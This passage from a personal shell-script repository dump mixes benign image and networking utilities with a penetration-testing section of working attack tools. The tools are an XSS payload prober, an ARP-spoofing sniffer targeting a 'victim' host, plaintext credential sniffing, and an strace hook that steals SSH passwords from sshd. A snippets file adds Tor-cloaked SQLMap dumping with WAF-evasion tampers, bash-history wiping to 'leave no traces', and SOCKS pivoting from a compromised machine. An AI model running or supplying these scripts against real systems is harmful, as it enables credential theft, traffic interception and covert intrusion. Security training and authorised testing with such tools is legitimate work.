37 | 
38 | for CMD in ${CMDS[@]} ; do
39 |     command_exists $CMD
40 | done
41 | 
42 | 
43 | # MAIN -------------------------------------------------------------------------
44 | 
45 | [[ $DEBUG -ne 0 ]] && set -x
46 | 
47 | OUT_HTML=/tmp/.rnd-${RANDOM}.html
48 | 
49 | wget $URL -O $OUT_HTML
50 | cat $OUT_HTML | grep -F '
' -f5 | cut -d'<' -f1 >> $DICT 51 | 52 | sort -u $DICT -o $DICT 53 | 54 | rm -f $OUT_HTML $OUT_CSV 55 | -------------------------------------------------------------------------------- /Hacking/Penetration_Testing/find_reflected_xss.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: find_reflected_xss.sh 6 | # 7 | # Description: A script that, given a domain, tries to find URLs vulnerable to 8 | # Reflected Cross-Site Scripting (XSS) attacks. 9 | # 10 | # Usage: ./find_reflected_xss.sh 11 | # 12 | # 13 | # --TODO-- 14 | # - ??? 15 | # 16 | # 17 | ################################################################################ 18 | 19 | 20 | # VARIABLES -------------------------------------------------------------------- 21 | 22 | DOMAIN=$1 23 | 24 | 25 | # MAIN ------------------------------------------------------------------------- 26 | 27 | DIR=$(mktemp -d -u --suffix="$DOMAIN") 28 | cd $DIR 29 | 30 | subfinder -d "$1" -o subs.txt 31 | cat subs.txt | httpx -o alive_subs.txt 32 | cat alive_subs.txt | waybackurls | tee wayback_urls.txt 33 | cat wayback_urls.txt | grep '=' | tee param_urls.txt 34 | cat param_urls.txt | grep '=' | qsreplace '">' | while read -r url ; do 35 | curl -s "$url" | grep -q "alert" && echo "[XSS Found] $url" | tee -a output.txt 36 | done -------------------------------------------------------------------------------- /Hacking/Penetration_Testing/sniff_host_traffic.sh: -------------------------------------------------------------------------------- 1 | s#!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: sniff_host_traffic.sh 6 | # 7 | # Description: A script that attempts to sniff the traffic of another machine 8 | # in the same subnet. 9 | # 10 | # Usage: ./sniff_host_traffic.sh 11 | # 12 | # 13 | # --TODO-- 14 | # - ??? 15 | # 16 | # 17 | ################################################################################ 18 | 19 | 20 | # VARIABLES -------------------------------------------------------------------- 21 | 22 | NIC="eth0" 23 | GATEWAY_IP=192.168.0.1 24 | VICTIM_IP=192.168.0.123 25 | 26 | 27 | # FUNCTIONS -------------------------------------------------------------------- 28 | 29 | command_exists() { 30 | command -v "$1" >/dev/null 2>&1 || { echo "Command not found: $1" 1>&2 ; exit 1 ; } 31 | } 32 | 33 | 34 | # CHECKS ----------------------------------------------------------------------- 35 | 36 | if [[ $EUID -ne 0 ]] ; then 37 | echo "This script must be run as root!" 
1>&2 38 | 39 | exit 1 40 | fi 41 | 42 | declare -a CMDS=( 43 | "arpspoof" 44 | "dsniff" 45 | "tcpdump" 46 | ); 47 | 48 | for CMD in ${CMDS[@]} ; do 49 | command_exists $CMD 50 | done 51 | 52 | 53 | # MAIN ------------------------------------------------------------------------- 54 | 55 | VIPN=$(host $VICTIM_IP | grep -v 'not found' | head -1 | awk '{print $NF}') 56 | GTWN=$(host $GATEWAY_IP | grep -v 'not found' | head -1 | awk '{print $NF}') 57 | 58 | echo "INTERFACE: $NIC" 59 | echo "VICTIM: $VICTIM_IP ($VIPN)" 60 | echo "GATEWAY: $GATEWAY_IP ($GTWN)" 61 | 62 | sysctl -w net.ipv4.ip_forward=1 63 | arpspoof -t $VICTIM_IP $GATEWAY_IP 2&>/dev/null 64 | arpspoof -t $GATEWAY_IP $VICTIM_IP 2&>/dev/null 65 | dsniff -i $NIC -n 66 | 67 | echo 68 | echo "Run the following command in another terminal to see victim's traffic:" 69 | echo "tcpdump -v host $VICTIM_IP and not arp" 70 | 71 | echo 72 | echo "Run the following commands to stop the sniffing:" 73 | echo "killall arpspoof" 74 | echo "killall dsniff" 75 | echo "sysctl -w net.ipv4.ip_forward=0" 76 | -------------------------------------------------------------------------------- /Hacking/Penetration_Testing/sniff_passwords_tcpdump.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: sniff_passwords_tcpdump.sh 6 | # 7 | # Description: A script that sniffs the traffic on your machine looking for 8 | # plaintext credentials (HTTP, FTP, SMTP, IMAP, POP3, TELNET). 9 | # 10 | # Usage: ./sniff_passwords_tcpdump.sh 11 | # 12 | # 13 | # --TODO-- 14 | # - ??? 15 | # 16 | # 17 | ################################################################################ 18 | 19 | 20 | # VARIABLES -------------------------------------------------------------------- 21 | 22 | NIC="eth0" 23 | 24 | 25 | # FUNCTIONS -------------------------------------------------------------------- 26 | 27 | command_exists() { 28 | command -v "$1" >/dev/null 2>&1 || { echo "Command not found: $1" 1>&2 ; exit 1 ; } 29 | } 30 | 31 | 32 | # CHECKS ----------------------------------------------------------------------- 33 | 34 | if [[ $EUID -ne 0 ]] ; then 35 | echo "This script must be run as root!" 1>&2 36 | 37 | exit 1 38 | fi 39 | 40 | declare -a CMDS=( 41 | "egrep" 42 | "tcpdump" 43 | ); 44 | 45 | for CMD in ${CMDS[@]} ; do 46 | command_exists $CMD 47 | done 48 | 49 | 50 | # MAIN ------------------------------------------------------------------------- 51 | 52 | tcpdump port http or port ftp or port smtp or port imap or port pop3 or port telnet -lA -i "${NIC}" | egrep -i -B5 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|username:|password:|login:|pass |user ' 53 | 54 | -------------------------------------------------------------------------------- /Hacking/Penetration_Testing/sniff_ssh_credentials.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: sniff_ssh_credentials.sh 6 | # 7 | # Description: A script that sniffs usernames and passwords in plaintext. 8 | # You must be root on the server where SSH daemon is running. 9 | # The output will be something like: 10 | # 11 | # user1 12 | # password1 13 | # user2 14 | # password2 15 | # ... 16 | # 17 | # Usage: ./sniff_ssh_credentials.sh 18 | # 19 | # 20 | # --TODO-- 21 | # - improve sed regexp 22 | # - ??? 
23 | # 24 | # 25 | ################################################################################ 26 | 27 | 28 | # FUNCTIONS -------------------------------------------------------------------- 29 | 30 | command_exists() { 31 | command -v "$1" >/dev/null 2>&1 || { echo "Command not found: $1" 1>&2 ; exit 1 ; } 32 | } 33 | 34 | 35 | # CHECKS ----------------------------------------------------------------------- 36 | 37 | if [[ $EUID -ne 0 ]] ; then 38 | echo "This script must be run as root!" 1>&2 39 | 40 | exit 1 41 | fi 42 | 43 | declare -a CMDS=( 44 | "strace" 45 | ); 46 | 47 | for CMD in ${CMDS[@]} ; do 48 | command_exists $CMD 49 | done 50 | 51 | 52 | # MAIN ------------------------------------------------------------------------- 53 | 54 | 55 | SSHD_PPID=$(ps axf | grep sshd | grep -v grep | grep -v 'sshd:' | awk '{ print $1 }') 56 | 57 | strace -f -p $SSHD_PPID 2>&1 | grep --line-buffered -F 'read(6' | grep --line-buffered -E '\\10\\0\\0\\0|\\f\\0\\0\\0' | grep --line-buffered -oP '(?<=, ").*(?=",)' | sed -e 's/\\[[:alnum:]]//g' 58 | 59 | -------------------------------------------------------------------------------- /Hacking/snippets.txt: -------------------------------------------------------------------------------- 1 | # reverse DNS lookups via TOR (using findomain) 2 | torify findomain -t example.com 3 | 4 | 5 | 6 | # resolve a domain name via TOR 7 | tor-resolve www.example.com 127.0.0.1:9050 8 | 9 | 10 | 11 | # enumerate directories and files using DirSearch via TOR 12 | torify dirsearch -u https://www.example.com/ -e php -f --random-user-agents --suppress-empty -x 301,302,401,403,404 13 | 14 | 15 | 16 | # enumerate directories and files using Dirble via TOR 17 | torify dirble https://www.example.com/ -w /tmp/wordlist.txt -x .php,.html 18 | 19 | 20 | 21 | # enumerate directories and files using LulzBuster (https://packetstormsecurity.com/files/download/156406/lulzbuster-1.2.0.tar.xz) via TOR 22 | lulzbuster -s https://www.example.com/ -x 301,302,400,401,402,403,404,500 -U -w lists/small.txt -i -p socks5://localhost:9050 23 | 24 | 25 | 26 | # scrape site with Photon OSINT scanner via TOR 27 | torify photon -u https://www.example.com/ -o /tmp/XX -v --keys --dns 28 | 29 | 30 | 31 | # dump a DB using SQLMap via TOR 32 | sqlmap --check-tor --tor --random-agent -u 'https://www.example.com/test.php?id=1' 33 | sqlmap --check-tor --tor --random-agent -u 'https://www.example.com/test.php?id=1' --tamper="between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,percentage,randomcase,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor" 34 | 35 | 36 | 37 | # scan a WordPress site using WPScan via TOR 38 | wpscan --url www.example.com --rua --disable-tls-checks -e vp,vt,cb,dbe,u --proxy socks5://127.0.0.1:9050 39 | 40 | 41 | 42 | # use Nikto via TOR 43 | proxychains nikto -host https://example.com/ -useragent "Googlebot (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 44 | 45 | 46 | 47 | # fetch a web content using cURL via TOR 48 | curl -A "Googlebot/2.1 (+http://www.google.com/bot.html)" -s --socks5-hostname 127.0.0.1:9050 https://www.example.com 49 | 50 | 51 | 52 | # browse a website with LINKS (CLI) via TOR 53 | links -only-proxies 1 -socks-proxy 127.0.0.1:9050 https://ipleak.org/ 54 | 55 | 56 | 57 | # get info about your IP 
address when using TOR (via Mullvad VPN service) 58 | curl -s --socks5-hostname 127.0.0.1:9050 https://am.i.mullvad.net/json | jq 59 | 60 | 61 | 62 | # delete BASH history and avoid saving commands (= leave no traces) 63 | history -c 64 | rm -f $HISTFILE 65 | unset HISTFILE 66 | set +o history 67 | export HISTSIZE=0 68 | export HISTFILESIZE=0 69 | # one-liner 70 | history -c ; rm -f $HISTFILE ; unset HISTFILE ; set +o history ; export HISTSIZE=0 ; export HISTFILESIZE=0 71 | 72 | 73 | 74 | # upgrade a shell to a fully functional interactive shell 75 | python -c 'import pty; pty.spawn("/bin/bash")' 76 | -> CTRL+Z 77 | stty raw -echo 78 | fg 79 | reset 80 | 81 | 82 | 83 | # complete DNS enumeration with AMASS 84 | amass -v -whois -ip -active -brute -d example.com 85 | 86 | 87 | 88 | # directly connect to SQL databases with SQLMap 89 | sqlmap -d 'mysql://$USERNAME:$PASSWORD@$HOST:3306/$DATABASE' -v 3 --dbs --tables 90 | sqlmap -d 'mssql://$USERNAME:$PASSWORD@$HOST:1433/$DATABASE' -v 3 --dbs --tables 91 | 92 | 93 | 94 | # convert WPA-PSK captured handshake to hash (suitable for John The Ripper) 95 | /usr/lib/hashcat-utils/cap2hccapx.bin file.cap file.hccapx 96 | hccap2john file.hccapx >> hashes.txt 97 | 98 | 99 | 100 | # pivoting by executing a SOCKS5 server on a compromised target and forwarding the local port remotely via SSH 101 | # -> on your attacking machine: 102 | TARGET=victim 103 | mkdir -p /tmp/targets/$TARGET 104 | useradd -m -s /bin/nologin $TARGET 105 | ssh-keygen -t ecdsa -f /tmp/targets/$TARGET/sshkey -q -N "" 106 | mkdir /home/$TARGET/.ssh 107 | cp /tmp/targets/$TARGET/sshkey.pub /home/$TARGET/.ssh/authorized_keys 108 | chown -R $TARGET:$TARGET /home/$TARGET/.ssh 109 | chmod 600 /home/$TARGET/.ssh/authorized_keys 110 | cat /tmp/targets/$TARGET/sshkey 111 | (copy private key content) 112 | # -> on the victim machine: 113 | echo "pasted sshkey content" >> /tmp/.keyfile 114 | chmod 600 /tmp/.keyfile 115 | ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -L 22:127.0.0.1:2222 -i /tmp/.keyfile -fNT $TARGET@attackingmachine 116 | # -> on your attacking machine: 117 | ssh -D 0.0.0.0:8080 compromiseduser@127.0.0.1 -p 2222 -fNT 118 | 119 | 120 | 121 | # videos on YouTube with a very simple explanation on how to use the ZeroLogon exploit () 122 | https://www.youtube.com/watch?v=3xEk6ZaBMJ8 123 | https://www.youtube.com/watch?v=kGIDY-sF1Hk 124 | 125 | 126 | 127 | # update OpenVAS feeds 128 | runuser -u _gvm -- greenbone-nvt-sync 129 | runuser -u _gvm -- greenbone-scapdata-sync 130 | runuser -u _gvm -- greenbone-certdata-sync 131 | runuser -u _gvm -- greenbone-feed-sync --type GVMD_DATA 132 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | This is free and unencumbered software released into the public domain. 2 | 3 | Anyone is free to copy, modify, publish, use, compile, sell, or 4 | distribute this software, either in source code form or as a compiled 5 | binary, for any purpose, commercial or non-commercial, and by any 6 | means. 7 | 8 | In jurisdictions that recognize copyright laws, the author or authors 9 | of this software dedicate any and all copyright interest in the 10 | software to the public domain. We make this dedication for the benefit 11 | of the public at large and to the detriment of our heirs and 12 | successors. 
We intend this dedication to be an overt act of 13 | relinquishment in perpetuity of all present and future rights to this 14 | software under copyright law. 15 | 16 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, 17 | EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF 18 | MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 19 | IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR 20 | OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, 21 | ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR 22 | OTHER DEALINGS IN THE SOFTWARE. 23 | 24 | For more information, please refer to 25 | -------------------------------------------------------------------------------- /Media/aspectpad: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Developed by Fred Weinhaus 12/1/2009 .......... revised 11/2/2016 4 | # 5 | # ------------------------------------------------------------------------------ 6 | # 7 | # Licensing: 8 | # 9 | # Copyright © Fred Weinhaus 10 | # 11 | # My scripts are available free of charge for non-commercial use, ONLY. 12 | # 13 | # For use of my scripts in commercial (for-profit) environments or 14 | # non-free applications, please contact me (Fred Weinhaus) for 15 | # licensing arrangements. My email address is fmw at alink dot net. 16 | # 17 | # If you: 1) redistribute, 2) incorporate any of these scripts into other 18 | # free applications or 3) reprogram them in another scripting language, 19 | # then you must contact me for permission, especially if the result might 20 | # be used in a commercial or for-profit environment. 21 | # 22 | # My scripts are also subject, in a subordinate manner, to the ImageMagick 23 | # license, which can be found at: http://www.imagemagick.org/script/license.php 24 | # 25 | # ------------------------------------------------------------------------------ 26 | # 27 | # USAGE: aspectpad [-a aspect] [-m mode] [-p pcolor] [-t toler] infile outfile 28 | # USAGE: aspectpad [-help] 29 | # 30 | # OPTIONS: 31 | # 32 | # -a aspect aspect ratio value desired; float>=1; default=2 33 | # -m mode mode for aspect; al, ap, l or p; default=al 34 | # l=force landscape pad; p=force portrait pad; 35 | # al=automatic pad (landscape for square images); 36 | # ap=automatic pad (portrait for square images) 37 | # -p pcolor pad color; any valid IM color; default=black 38 | # -t toler aspect tolerance; float>=0; if absolute difference 39 | # between desired aspect and image aspect is less 40 | # than or equal to tolerance, then no padding; 41 | # default=0 42 | # 43 | ### 44 | # 45 | # NAME: ASPECTPAD 46 | # 47 | # PURPOSE: To pad an image with a color to a specified aspect ratio 48 | # and orientation. 49 | # 50 | # DESCRIPTION: ASPECTPAD pads an image with a color to a specified aspect 51 | # ratio and orientation. The user can choose to force the pad to either 52 | # landscape or portrait orientation or preserve the orientation in automatic 53 | # mode. All padding will result in the image being centered. 54 | # 55 | # OPTIONS: 56 | # 57 | # -a aspect ... ASPECT is the desired aspect ratio. Values are floats>=1. 58 | # The default=2 59 | # 60 | # -m mode ... MODE is the padding mode. Choices are: l, p, al or ap. When 61 | # mode=l, the padding will force the result to be landscape at the desired 62 | # aspect value. When mode=p, the padding will force the result to be portrait. 
63 | # When mode=al, the padding will preserve the aspect of the original image, but 64 | # will pad a square image into landscape format. When mode=ap, the padding will 65 | # preserve the aspect of the original image, but will pad a square image into 66 | # portrait format. The default=al. 67 | # 68 | # -p pcolor ... PCOLOR is the desired padding color. Any valid IM color 69 | # specification may be used. The default=black 70 | # 71 | # -t toler ... TOLER is the aspect tolerance. If the absolute difference 72 | # between desired aspect and image aspect is less than or equal to toler, 73 | # then no padding will be applied. Values are floats>=0. The default=0 74 | # 75 | # CAVEAT: No guarantee that this script will work on all platforms, 76 | # nor that trapping of inconsistent parameters is complete and 77 | # foolproof. Use At Your Own Risk. 78 | # 79 | ###### 80 | # 81 | 82 | # set default values 83 | aspect="2" # aspect>=1 84 | mode="al" # al, ap, l, p; a=auto 85 | pcolor="black" # pad color 86 | toler=0 # toler>=0 87 | 88 | # set directory for temporary files 89 | dir="." # suggestions are dir="." or dir="/tmp" 90 | 91 | # set up functions to report Usage and Usage with Description 92 | PROGNAME=`type $0 | awk '{print $3}'` # search for executable on path 93 | PROGDIR=`dirname $PROGNAME` # extract directory of program 94 | PROGNAME=`basename $PROGNAME` # base name of program 95 | usage1() 96 | { 97 | echo >&2 "" 98 | echo >&2 "$PROGNAME:" "$@" 99 | sed >&2 -e '1,/^####/d; /^###/g; /^#/!q; s/^#//; s/^ //; 4,$p' "$PROGDIR/$PROGNAME" 100 | } 101 | usage2() 102 | { 103 | echo >&2 "" 104 | echo >&2 "$PROGNAME:" "$@" 105 | sed >&2 -e '1,/^####/d; /^######/g; /^#/!q; s/^#*//; s/^ //; 4,$p' "$PROGDIR/$PROGNAME" 106 | } 107 | 108 | 109 | # function to report error messages 110 | errMsg() 111 | { 112 | echo "" 113 | echo $1 114 | echo "" 115 | usage1 116 | exit 1 117 | } 118 | 119 | 120 | # function to test for minus at start of value of second part of option 1 or 2 121 | checkMinus() 122 | { 123 | test=`echo "$1" | grep -c '^-.*$'` # returns 1 if match; 0 otherwise 124 | [ $test -eq 1 ] && errMsg "$errorMsg" 125 | } 126 | 127 | # test for correct number of arguments and get values 128 | if [ $# -eq 0 ] 129 | then 130 | # help information 131 | echo "" 132 | usage2 133 | exit 0 134 | elif [ $# -gt 10 ] 135 | then 136 | errMsg "--- TOO MANY ARGUMENTS WERE PROVIDED ---" 137 | else 138 | while [ $# -gt 0 ] 139 | do 140 | # get parameter values 141 | case "$1" in 142 | -help) # help information 143 | echo "" 144 | usage2 145 | exit 0 146 | ;; 147 | -m) # get mode 148 | shift # to get the next parameter 149 | # test if parameter starts with minus sign 150 | errorMsg="--- INVALID MODE SPECIFICATION ---" 151 | checkMinus "$1" 152 | mode=`echo "$1" | tr '[A-Z]' '[a-z]'` 153 | case "$mode" in 154 | l) ;; 155 | p) ;; 156 | al) ;; 157 | ap) ;; 158 | *) errMsg "--- MODE=$mode IS AN INVALID VALUE ---" 159 | esac 160 | ;; 161 | -a) # get aspect 162 | shift # to get the next parameter 163 | # test if parameter starts with minus sign 164 | errorMsg="--- INVALID ASPECT SPECIFICATION ---" 165 | checkMinus "$1" 166 | aspect=`expr "$1" : '\([.0-9]*\)'` 167 | aspecttest=`echo "$aspect < 1" | bc` 168 | [ $aspecttest -eq 1 ] && errMsg "--- ASPECT=$aspect MUST BE A FLOAT GREATER THAN OR EQUAL TO 1 ---" 169 | ;; 170 | -p) # get pcolor 171 | shift # to get the next parameter 172 | # test if parameter starts with minus sign 173 | errorMsg="--- INVALID PCOLOR SPECIFICATION ---" 174 | checkMinus "$1" 175 | pcolor="$1" 176 
| ;; 177 | -t) # get toler 178 | shift # to get the next parameter 179 | # test if parameter starts with minus sign 180 | errorMsg="--- INVALID TOLER SPECIFICATION ---" 181 | checkMinus "$1" 182 | toler=`expr "$1" : '\([.0-9]*\)'` 183 | tolertest=`echo "$toler < 0" | bc` 184 | [ $tolertest -eq 1 ] && errMsg "--- TOLER=$toler MUST BE A NON-NEGATIVE FLOAT ---" 185 | ;; 186 | -) # STDIN and end of arguments 187 | break 188 | ;; 189 | -*) # any other - argument 190 | errMsg "--- UNKNOWN OPTION ---" 191 | ;; 192 | *) # end of arguments 193 | break 194 | ;; 195 | esac 196 | shift # next option 197 | done 198 | # 199 | # get infile and outfile 200 | infile="$1" 201 | outfile="$2" 202 | fi 203 | 204 | # test that infile provided 205 | [ "$infile" = "" ] && errMsg "NO INPUT FILE SPECIFIED" 206 | 207 | # test that outfile provided 208 | [ "$outfile" = "" ] && errMsg "NO OUTPUT FILE SPECIFIED" 209 | 210 | # setup temporary images 211 | tmpA1="$dir/aspectpad_1_$$.mpc" 212 | tmpA2="$dir/aspectpad_1_$$.cache" 213 | trap "rm -f $tmpA1 $tmpA2;" 0 214 | trap "rm -f $tmpA1 $tmpA2; exit 1" 1 2 3 15 215 | trap "rm -f $tmpA1 $tmpA2; exit 1" ERR 216 | 217 | 218 | # read the input image and test validity. 219 | convert -quiet "$infile" +repage "$tmpA1" || 220 | errMsg "--- FILE $infile DOES NOT EXIST OR IS NOT AN ORDINARY FILE, NOT READABLE OR HAS ZERO SIZE ---" 221 | 222 | # get size and aspect ratio of input 223 | ww=`convert $tmpA1 -ping -format "%w" info:` 224 | hh=`convert $tmpA1 -ping -format "%h" info:` 225 | wratio=`convert xc: -format "%[fx:$ww/$hh]" info:` 226 | hratio=`convert xc: -format "%[fx:$hh/$ww]" info:` 227 | #echo "ww=$ww; hh=$hh wratio=$wratio; hratio=$hratio" 228 | 229 | # test if aspect >= ratio 230 | wtest=`convert xc: -format "%[fx:$aspect>=$wratio?1:0]" info:` 231 | htest=`convert xc: -format "%[fx:$aspect>=$hratio?1:0]" info:` 232 | #echo "wtest=$wtest; htest=$htest" 233 | 234 | # test if within toler of desired aspect 235 | tratio=`convert xc: -format "%[fx:$wratio>=1?$wratio:$hratio]" info:` 236 | ttest=`convert xc: -format "%[fx:abs($tratio-$aspect)<=$toler?1:0]" info:` 237 | #echo "tratio=$tratio; ttest=$ttest" 238 | 239 | # copy input to output if image aspect is within toler 240 | if [ $ttest -eq 1 ]; then 241 | convert $tmpA1 "$outfile" 242 | exit 243 | fi 244 | 245 | # force landscape mode 246 | if [ "$mode" = "l" -a $wtest -eq 1 ]; then 247 | ww=`convert xc: -format "%[fx:$hh*$aspect]" info:` 248 | convert $tmpA1 -gravity center -background "$pcolor" -extent ${ww}x${hh} "$outfile" 249 | exit 250 | elif [ "$mode" = "l" -a $wtest -eq 0 ]; then 251 | hh=`convert xc: -format "%[fx:$hh*$wratio/$aspect]" info:` 252 | convert $tmpA1 -gravity center -background "$pcolor" -extent ${ww}x${hh} "$outfile" 253 | exit 254 | fi 255 | 256 | # force portrait mode 257 | if [ "$mode" = "p" -a $htest -eq 1 ]; then 258 | hh=`convert xc: -format "%[fx:$ww*$aspect]" info:` 259 | convert $tmpA1 -gravity center -background "$pcolor" -extent ${ww}x${hh} "$outfile" 260 | exit 261 | elif [ "$mode" = "p" -a $htest -eq 0 ]; then 262 | ww=`convert xc: -format "%[fx:$ww*$hratio/$aspect]" info:` 263 | convert $tmpA1 -gravity center -background "$pcolor" -extent ${ww}x${hh} "$outfile" 264 | exit 265 | fi 266 | 267 | 268 | # auto square image 269 | if [ "$mode" = "al" -a $ww -eq $hh ]; then 270 | ww=`convert xc: -format "%[fx:$hh*$aspect]" info:` 271 | convert $tmpA1 -gravity center -background "$pcolor" -extent ${ww}x${hh} "$outfile" 272 | exit 273 | elif [ "$mode" = "ap" -a $ww -eq $hh ]; then 274 | 
hh=`convert xc: -format "%[fx:$ww*$aspect]" info:` 275 | convert $tmpA1 -gravity center -background "$pcolor" -extent ${ww}x${hh} "$outfile" 276 | exit 277 | fi 278 | 279 | 280 | # auto landscape image 281 | if [ $ww -gt $hh -a $wtest -eq 1 ]; then 282 | ww=`convert xc: -format "%[fx:$hh*$aspect]" info:` 283 | convert $tmpA1 -gravity center -background "$pcolor" -extent ${ww}x${hh} "$outfile" 284 | exit 285 | elif [ $ww -gt $hh -a $wtest -eq 0 ]; then 286 | hh=`convert xc: -format "%[fx:$hh*$wratio/$aspect]" info:` 287 | convert $tmpA1 -gravity center -background "$pcolor" -extent ${ww}x${hh} "$outfile" 288 | exit 289 | fi 290 | 291 | 292 | # auto portrait image 293 | if [ $hh -gt $ww -a $htest -eq 1 ]; then 294 | hh=`convert xc: -format "%[fx:$ww*$aspect]" info:` 295 | convert $tmpA1 -gravity center -background "$pcolor" -extent ${ww}x${hh} "$outfile" 296 | exit 297 | elif [ $hh -gt $ww -a $htest -eq 0 ]; then 298 | ww=`convert xc: -format "%[fx:$ww*$hratio/$aspect]" info:` 299 | convert $tmpA1 -gravity center -background "$pcolor" -extent ${ww}x${hh} "$outfile" 300 | exit 301 | fi 302 | 303 | -------------------------------------------------------------------------------- /Media/image_orientation.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: image_orientation.sh 6 | # 7 | # Description: A script that, for every image in a folder, prints its pixel 8 | # resolution and its orientation (portrait, landscape or squared). 9 | # The script "aspectpad" by Fred Weinhaus is required. 10 | # 11 | # Usage: ./image_orientation.sh 12 | # 13 | # 14 | # --TODO-- 15 | # - ??? 16 | # 17 | # 18 | ################################################################################ 19 | 20 | 21 | # FUNCTIONS -------------------------------------------------------------------- 22 | 23 | command_exists() { 24 | command -v "$1" >/dev/null 2>&1 || { echo "Command not found: $1" 1>&2 ; exit 1 ; } 25 | } 26 | 27 | 28 | # CHECKS ----------------------------------------------------------------------- 29 | 30 | declare -a CMDS=( 31 | "identify" 32 | ); 33 | 34 | for CMD in ${CMDS[@]} ; do 35 | command_exists $CMD 36 | done 37 | 38 | 39 | # MAIN ------------------------------------------------------------------------- 40 | 41 | if [[ "$#" -eq 0 ]] ; then 42 | echo "./image_orientation.sh " 43 | 44 | exit 1 45 | fi 46 | 47 | DIR=$1 48 | 49 | if [[ ! -d "$DIR" ]] ; then 50 | echo "Error! Directory with images not found: $DIR" 51 | 52 | exit 1 53 | fi 54 | 55 | SCR_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" >/dev/null && pwd)" 56 | OLD_DIR=$(pwd) 57 | 58 | if [[ ! -x "$SCR_DIR/aspectpad" ]] ; then 59 | echo "Error! Script \"aspectpad\" not found (it must be in the same directory of this script)." 
60 | 61 | exit 1 62 | fi 63 | 64 | cd $1 65 | for IMG in $(ls -1 *jpg *JPG *png *PNG 2> /dev/null) ; do 66 | SIZE=$(identify -format '%w %h' $IMG | sed -e 's/\ /x/g') 67 | W=$(echo $SIZE | cut -d'x' -f1) 68 | H=$(echo $SIZE | cut -d'x' -f2) 69 | 70 | if (( $W > $H )) ; then 71 | FORMAT="landscape" 72 | $SCR_DIR/aspectpad -a 1.5 -m l -p black $IMG new/$IMG 73 | elif (( $W < $H )) ; then 74 | FORMAT="portrait" 75 | $SCR_DIR/aspectpad -a 1.5 -m p -p black $IMG new/$IMG 76 | else 77 | FORMAT="squared" 78 | fi 79 | 80 | echo "$IMG $SIZE $FORMAT" 81 | done 82 | 83 | cd $OLD_DIR 84 | -------------------------------------------------------------------------------- /Media/snippets.txt: -------------------------------------------------------------------------------- 1 | # reduce the size of a bunch of images at a 50% ratio 2 | mkdir out ; for IMG in *jpg ; do convert -resize 50% $IMG out/$IMG ; done 3 | -------------------------------------------------------------------------------- /Networking/get_nics_with_ip_mac_status.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: get_nics_with_ip_mac_status.sh 6 | # 7 | # Description: A script that returns a list of all the NICs with their IP and 8 | # MAC addresses plus their status. Works on GNU/Linux only. 9 | # 10 | # Usage: ./get_nics_with_ip_mac_status.sh 11 | # 12 | # 13 | # --TODO-- 14 | # - Fix code to get NICs list on RHEL 7 15 | # - Add support for other Unix systems 16 | # - ??? 17 | # 18 | # 19 | ################################################################################ 20 | 21 | 22 | # FUNCTIONS -------------------------------------------------------------------- 23 | 24 | command_exists() { 25 | command -v "$1" >/dev/null 2>&1 || { echo "ERROR! 
Command not found: $1" 1>&2 ; exit 1 ; } 26 | } 27 | 28 | display_usage() { 29 | echo "Usage: $0" 30 | } 31 | 32 | 33 | # CHECKS ----------------------------------------------------------------------- 34 | 35 | declare -a CMDS=( 36 | "ifconfig" 37 | "ip" 38 | ); 39 | 40 | for CMD in ${CMDS[@]} ; do 41 | command_exists $CMD 42 | done 43 | 44 | 45 | # MAIN ------------------------------------------------------------------------- 46 | 47 | if [[ $# -ne 0 ]] ; then 48 | display_usage 49 | 50 | exit 1 51 | else 52 | # The following command *does not* work on RHEL 7 (ifconfig output format has changed) 53 | #for NIC in $(ifconfig -a | sed 's/[ \t].*//;/^\(lo\|\)$/d;/:/d') ; do 54 | for NIC in $(ifconfig -s | grep -v Iface | awk '{print $1}' | grep -v lo | grep -v inet6) ; do 55 | MAC=$(ip addr show $NIC | grep 'link/ether' | awk '{print $2}') 56 | STATUS=$(ip -4 addr show $NIC | grep -o 'state [^ ,]\+' | sed 's/state\ //g') 57 | 58 | if [[ "$STATUS" != "UP" ]] ; then 59 | printf "%-20s %-18s %-10s %-8s\n" $MAC " " $NIC $STATUS 60 | else 61 | printf "%-20s %-18s %-10s %-8s\n" MAC IP NIC STATUS 62 | echo "------------------------------------------------------------" 63 | 64 | while read -r ROW ; do 65 | IP=$(echo $ROW | awk '{print $2}' | sed 's/\/.*//') 66 | IFACE=$(echo $ROW | awk 'NF>1{print $NF}') 67 | 68 | printf "%-20s %-18s %-10s %-8s\n" $MAC $IP $IFACE $STATUS 69 | done < <(ip -4 addr show $NIC | grep 